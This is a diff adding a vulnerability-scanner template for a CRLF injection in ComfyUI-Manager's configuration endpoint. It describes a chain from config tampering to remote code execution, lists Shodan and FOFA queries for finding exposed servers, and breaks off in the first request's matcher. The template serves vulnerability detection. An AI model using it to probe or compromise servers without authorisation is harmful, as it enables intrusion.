diff --git a/http/cves/2026/CVE-2026-22777.yaml b/http/cves/2026/CVE-2026-22777.yaml
new file mode 100644
index 000000000000..e4546c245a0a
--- /dev/null
+++ b/http/cves/2026/CVE-2026-22777.yaml
@@ -0,0 +1,77 @@
+id: CVE-2026-22777
+
+info:
+  name: ComfyUI-Manager - CRLF Injection via Configuration Endpoint
+  author: LK-maker-007
+  severity: high
+  description: |
+    ComfyUI-Manager versions prior to 3.39.2 (and 4.0.0 through 4.0.4) are vulnerable to
+    CRLF injection in the /api/manager/db_mode configuration endpoint. The write_config()
+    function does not sanitize carriage return (\r) or newline (\n) characters from
+    user-supplied query parameter values before writing to the config.ini file. An
+    unauthenticated attacker can inject arbitrary key-value pairs, including downgrading
+    security_level from normal to weak, enabling subsequent remote code execution via the
+    same chain as CVE-2025-67303. Exploitation requires ComfyUI to be started with the
+    --listen flag (network-accessible mode).
+  impact: |
+    An unauthenticated attacker can overwrite security-critical configuration values
+    including security_level=weak, which unlocks custom node installation. This enables
+    subsequent remote code execution through a malicious custom node.
+  remediation: |
+    Upgrade ComfyUI-Manager to version 3.39.2 or 4.0.5 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-22777
+    - https://github.com/Comfy-Org/ComfyUI-Manager/security/advisories/GHSA-562r-8445-54r2
+    - https://github.com/Comfy-Org/ComfyUI-Manager/commit/f4fa394e0f03b013f1068c96cff168ad10bd0410
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-22777
+    cwe-id: CWE-93
+    epss-score: 0.00015
+    epss-percentile: 0.03132
+    cpe: cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: comfy
+    product: comfyui-manager
+    shodan-query: http.title:"ComfyUI" http.html:"/api/manager"
+    fofa-query: title="ComfyUI"
+  tags: cve,cve2026,comfyui,crlf,injection,config-injection,intrusive,vuln
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/manager/db_mode"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - '!contains(body, "